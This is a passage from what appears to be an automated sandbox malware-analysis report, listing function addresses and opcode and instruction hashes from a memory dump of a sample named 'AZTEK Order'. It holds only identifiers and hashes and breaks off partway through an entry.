                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9165d0a21fe1a9f0d1a723aa8cd365c2e6805b0d1391001019ea8b4985117e44
                                                      • Instruction ID: c1d0ecdc70d3e13b6c5d3ac21254595bc7c27affb6fc21dcfd8266dacbeac0a1
                                                      • Opcode Fuzzy Hash: 9165d0a21fe1a9f0d1a723aa8cd365c2e6805b0d1391001019ea8b4985117e44
                                                      • Instruction Fuzzy Hash: 6E115B71A0021DABDB15EF68C884EAEBBB5FB48344F004099F901D7354DB34EA51CB90
                                                      Function 0182C97C Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e13e3ec6e9b09ae6271cd6c0764fe39f72b395aa19833c813bec96357780005
                                                      • Instruction ID: 456ce743c5963510943ef09efe4cfc9ba414342650897cd57c77e96a77438be2
                                                      • Opcode Fuzzy Hash: 3e13e3ec6e9b09ae6271cd6c0764fe39f72b395aa19833c813bec96357780005
                                                      • Instruction Fuzzy Hash: 371179B16083089FC700DF69D445A9BBBE4EF98710F00495AF998D7394E630E910CB92
                                                      Function 01874A80 Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                      • Instruction ID: 778652bf19f93ab913ad58114e2ab6cbbe6a9ed10f292e22eeda1e2c0eb54283
                                                      • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                      • Instruction Fuzzy Hash: C701D4322046059FD721AA6DD844F96FBEAFBC6710F044819E642CB694DAB0F980CB94
                                                      Function 0182CA11 Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b81d8c906615c304fca3dbd4c811c10a6aa8a8cb02dab9c976ff7dd8d2d096a
                                                      • Instruction ID: e3fda973c27d22fb555ea3327d1fb1649ccfe02a59a1359fc86dc1556211b01b
                                                      • Opcode Fuzzy Hash: 0b81d8c906615c304fca3dbd4c811c10a6aa8a8cb02dab9c976ff7dd8d2d096a
                                                      • Instruction Fuzzy Hash: 0F1179B1608308AFC700DF69D445A5FBBE4FF99750F00895AF958D73A4E630E940CB92
                                                      Function 017BE016 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                      • Instruction ID: f50dc0db9714d40d4d3ce2a84ddc27b10686eb8338f84ef8c713ac9d4ae17cb4
                                                      • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                      • Instruction Fuzzy Hash: 0B018F322045809FE322871DCA88FA7FBE8EF45754F1904A5FA05CB791DB38DC40C621
                                                      Function 0179826B Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a83c5eda68f5240a1271624444b69a75eae4b85a545d05a0d24dec8d0e3917fb
                                                      • Instruction ID: 1ac5714d2bb1d74203365c20e18a5c0a9fe02b5cf4aba9d4028d318517b2ffa9
                                                      • Opcode Fuzzy Hash: a83c5eda68f5240a1271624444b69a75eae4b85a545d05a0d24dec8d0e3917fb
                                                      • Instruction Fuzzy Hash: 8D01A731704509DFDB14EB6DEC089AEF7E9FF45620B5940A9DA01DB784DE20DE05C792
                                                      Function 0184EB50 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2a39ab7a669c0a62626e99766ee401834df06852eb5ebbf4e25e7a9ddddd3f74
                                                      • Instruction ID: eb2dafd24bea922aad8f62db26dc2c0e314bee3d80d9dadd0c27b9aedc98bf52
                                                      • Opcode Fuzzy Hash: 2a39ab7a669c0a62626e99766ee401834df06852eb5ebbf4e25e7a9ddddd3f74
                                                      • Instruction Fuzzy Hash: E101F271240709AFD3315F19D884F46BAA8EF54B50F14082EB706DF394DBB5AA408B64
                                                      Function 017A2582 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4220777ce5b5495c948e750c73c6f4cfb7a3306eec5f42ed0f56255fea34f5c2
                                                      • Instruction ID: e45be4a676e48b75aece5dd80c8da7d1c99d141597bbebbf6988d41010120109
                                                      • Opcode Fuzzy Hash: 4220777ce5b5495c948e750c73c6f4cfb7a3306eec5f42ed0f56255fea34f5c2
                                                      • Instruction Fuzzy Hash: A1F0F432A42A10B7C732DB5ACC84F47FAAAEBC4B90F104168E60597640DA30ED01DAA0
                                                      Function 017CC073 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                      • Instruction ID: 6a612bfd5dc0a874a068c723d09c5be26afb461f7add8819685449071895558c
                                                      • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                      • Instruction Fuzzy Hash: 7FF0C2B3600611ABD325CF4DDC40E57FBEADBD5B80F04812CA609CB220EA31ED04CB90
                                                      Function 0179C310 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                      • Instruction ID: 14d911da17c942933627f544b3e712701d0f0fad72acca80d0e3963ecad6b01d
                                                      • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                      • Instruction Fuzzy Hash: A0F0FC332046639BDF3316596844B6BE9958FD5A64F190035E30D9B244CA608D0956D2
                                                      Function 017DCA6F Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                      • Instruction ID: a46c41a14af5b50bbe402efdf94818c698ff9c256db342a9256499ba7be68e51
                                                      • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                      • Instruction Fuzzy Hash: 5201F9326406899BD323971DCC49F59FBACEF82754F0944A9FA04DB691DB74CA40C211
                                                      Function 018761E5 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d82e77ece2bd87824b66acb5ea1138b484c027a4d8dc46223f5fb09a69670d9d
                                                      • Instruction ID: 2f79e4e4e7461e6e5d80897eed723f8d66b270eb29a83c1c0961e6103723f6ce
                                                      • Opcode Fuzzy Hash: d82e77ece2bd87824b66acb5ea1138b484c027a4d8dc46223f5fb09a69670d9d
                                                      • Instruction Fuzzy Hash: BC018F71A10249AFDB00DFA9D845AEEBBF8BF58314F14005AE505E7280E734EA01CB94
                                                      Function 018263C0 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                      • Instruction ID: 6afa0901f4cf4c36c1126d5d1e64ca5639833494c4d1788abb7e1bfdc6bfff82
                                                      • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                      • Instruction Fuzzy Hash: 5DF0127210001DBFEF029F94DD80DEF7B7DFB55798B104129FA1192160D635DE21A7A0
                                                      Function 0182A4B0 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b0b4925a6fd01c6e59f6638ef765e177764688bf0921607c91d352159163cb0b
                                                      • Instruction ID: 1cf266568112b5c696127f77aeb16c22e1879d5c51c459c2c7eda7468499cca5
                                                      • Opcode Fuzzy Hash: b0b4925a6fd01c6e59f6638ef765e177764688bf0921607c91d352159163cb0b
                                                      • Instruction Fuzzy Hash: 9C018936100119ABCF129E84D940EDA7F66FF4C754F058106FE18A6620C336DAB0EF81
                                                      Function 0179C0F0 Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 51d30044f6dcb2a79ba72f4e7cca5e025010579d0d5243d1221ed57539a49b6c
                                                      • Instruction ID: 6c43804fc8bf9bf494a4c08e88f308b692cadb5de56a1ed1831b0875df8ac413
                                                      • Opcode Fuzzy Hash: 51d30044f6dcb2a79ba72f4e7cca5e025010579d0d5243d1221ed57539a49b6c
                                                      • Instruction Fuzzy Hash: 07F024F22882415BFF169619AC05B32F69AE7C0650F65807AEB058B2D1EA70DC0583A8
                                                      Function 017D656A Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5932f02e394e50f85535ed673162622bc8b8e023b4aa5b6aa53b4bc54b3170f1
                                                      • Instruction ID: 4a2e2e4f72588d2f76a78f9c9320bf034a240cd84f3bfe4d022c9ac607b15a83
                                                      • Opcode Fuzzy Hash: 5932f02e394e50f85535ed673162622bc8b8e023b4aa5b6aa53b4bc54b3170f1
                                                      • Instruction Fuzzy Hash: 2501A4712006859BE3239B6CCD48F65B7E8BB40B04F980594FA02CB6DAD768D6C18610
                                                      Function 0184437C Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                      • Instruction ID: 02ba3e093b89021263a7f2f5cfc39d1cbbb592f76194347b4136160494e29f6c
                                                      • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                      • Instruction Fuzzy Hash: 38F0AE37341E1747E776AA2D9414F2FE695AF90F51F05052CA556CB640DF60DD01C790
                                                      Function 0182C89D Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f9131eec53f2230f9a54d4f10b429ef831d3b6fa8ab960720cdb032f4f556dd
                                                      • Instruction ID: 6bc764c4d7d44ffd304cfff4cb6852ca3ab287a8a6c9766d5646139e6e34d87b
                                                      • Opcode Fuzzy Hash: 8f9131eec53f2230f9a54d4f10b429ef831d3b6fa8ab960720cdb032f4f556dd
                                                      • Instruction Fuzzy Hash: 06F0A4706053049FC310EF28C445E2EB7E4FF58714F40465AB894DB394E634EA00C756
                                                      Function 0182E872 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                      • Instruction ID: bcba071f42b0064f1205c7a29a63c533f9fc3e14841c31f1a46402d8c438929d
                                                      • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                      • Instruction Fuzzy Hash: EAF054337115219BD3329A4ECCC0F16B768AFD5B60F190465EA54DB264C7A0ED8187D4
                                                      Function 017D0854 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                      • Instruction ID: 99dd0bb410a2787ffd581fb0ebf0e87224e8061264122b0ff0a249861019dd9e
                                                      • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                      • Instruction Fuzzy Hash: 0AF02472600204AFE714DB21CD06F86F7F9EF98300F148078A545C7164FAB0ED10C654
                                                      Function 0182C912 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 55bb3332b16af8a17ab549837521ceb2dd6461cbad0ae1d996c6c1d19c7130ca
                                                      • Instruction ID: 94e3ede71048611eb505aa6b0d60509d85833652ac7dd53dc13b29f197d9c6e2
                                                      • Opcode Fuzzy Hash: 55bb3332b16af8a17ab549837521ceb2dd6461cbad0ae1d996c6c1d19c7130ca
                                                      • Instruction Fuzzy Hash: 28F04F70A01249AFCB04EF69D559EAEB7F4EF18344F008055A955EB395DA34EB01CB50
                                                      Function 017A47FB Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f3f07e41acbfef629007afa29aaf7bc89be78eca8a244525150de55fe82d302d
                                                      • Instruction ID: 09648bd036a9eb067ef1f1ee50114b07f31a8f397193437fba34f2ee9f41869e
                                                      • Opcode Fuzzy Hash: f3f07e41acbfef629007afa29aaf7bc89be78eca8a244525150de55fe82d302d
                                                      • Instruction Fuzzy Hash: 16F024319962E08FE736CB1CE044B21FBC49B80630F8C4B6AC54B83102C3A1E880C611
                                                      Function 01860115 Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 427688d106113d68e9b645f31779d5c88fd102ddab531ee5ddeb1ebf4e3a24a4
                                                      • Instruction ID: 97f346df34b90fcdcf59a4d8a1d9842a333d72946d1f7e4c8b9849ddc4a1cf34
                                                      • Opcode Fuzzy Hash: 427688d106113d68e9b645f31779d5c88fd102ddab531ee5ddeb1ebf4e3a24a4
                                                      • Instruction Fuzzy Hash: 32F02726415A8086CF335B3C64503D16B58E741314F2D1045EDA0D7206D5748B83C729
                                                      Function 017DC5ED Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e5fb5a055da00ca564a95b49088fbe72424fc0daa28ae8d43b86d895614c618
                                                      • Instruction ID: eea122ec1d062aef45c7e61260f658f3659cc8eb95c2e650e1184a3740e4ce42
                                                      • Opcode Fuzzy Hash: 2e5fb5a055da00ca564a95b49088fbe72424fc0daa28ae8d43b86d895614c618
                                                      • Instruction Fuzzy Hash: 0EF0EC725256999FE7239B2CC148B61FBF8AB017B0F1C986EE506C7512C360E880CA61
                                                      Function 017E2619 Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                      • Instruction ID: a3f8b1357714e489ed819792044ec0cfde2be78becaa54882413dc40ba870679
                                                      • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                      • Instruction Fuzzy Hash: F2E0D8723406012BE7129F598CC8F47BBEEDFDAB10F040479B6045F256CAE2DD0986A4
                                                      Function 01836030 Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                      • Instruction ID: cb7ffc22c819291c1065909938b6ca0f5276911b2babccc8146a092e322a93d6
                                                      • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                      • Instruction Fuzzy Hash: B5F08C72100204AFE3219F09D885B52F7B8EB55368F19C025E608EB160E37AEE40CBA0
                                                      Function 017A0710 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                      • Instruction ID: 4e2ade01b4be75fdd48585a218aaae22a636bf4b46ed9bcc435e7978fcbc03d7
                                                      • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                      • Instruction Fuzzy Hash: 02F0E5392043459BDB1ACF19C040A95FFA4FB81360B010498FD428B311DB31E981CB51
                                                      Function 017D49D0 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                      • Instruction ID: 5dab6623c24b48b49ca6971a1e1fcf6c9e80c5844c79a22d76a847c3ba70728d
                                                      • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                      • Instruction Fuzzy Hash: 12E0D83224414DABD3311A69C808B66F7B5EBD47A0F160429E242AB958DB70DD40C7D9
                                                      Function 0184678E Relevance: .0, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                      • Instruction ID: 50a965ba540220696490113811e65954d01e4cbd62b95831179b8fd5932d7f74
                                                      • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                      • Instruction Fuzzy Hash: 2AE04872640214BBDB2197598D05F9ABEBCDB54F90F154155B601D7194E570DE00D690
                                                      Function 018708C0 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                      • Instruction ID: 7232ce5f25da981b27b84d52455238a1ba558ff73d8779bde687f8d9c9304fd4
                                                      • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                      • Instruction Fuzzy Hash: 2EE09B316403548BCB258A1EC540A73B7E8DF96764F15806DE90987712C231F942C6D0
                                                      Function 017A25E0 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 946fedfe9f8c99aedb8573479e6e560fc7246f903cc44c9eda984c90e7e47cd1
                                                      • Instruction ID: aa050ca303264c1a9b8761e261f2a733125f2ea15855b35c42e3221fad88701a
                                                      • Opcode Fuzzy Hash: 946fedfe9f8c99aedb8573479e6e560fc7246f903cc44c9eda984c90e7e47cd1
                                                      • Instruction Fuzzy Hash: 91E092321005549BC722BF29DD09F8AB7DAEFA4360F154615F11557195CB70A950C7C8
                                                      Function 0185A456 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                      • Instruction ID: 1d728cfac18e17565dd827c6957ebba4e13a9017a6aad93a64fa147823a974b4
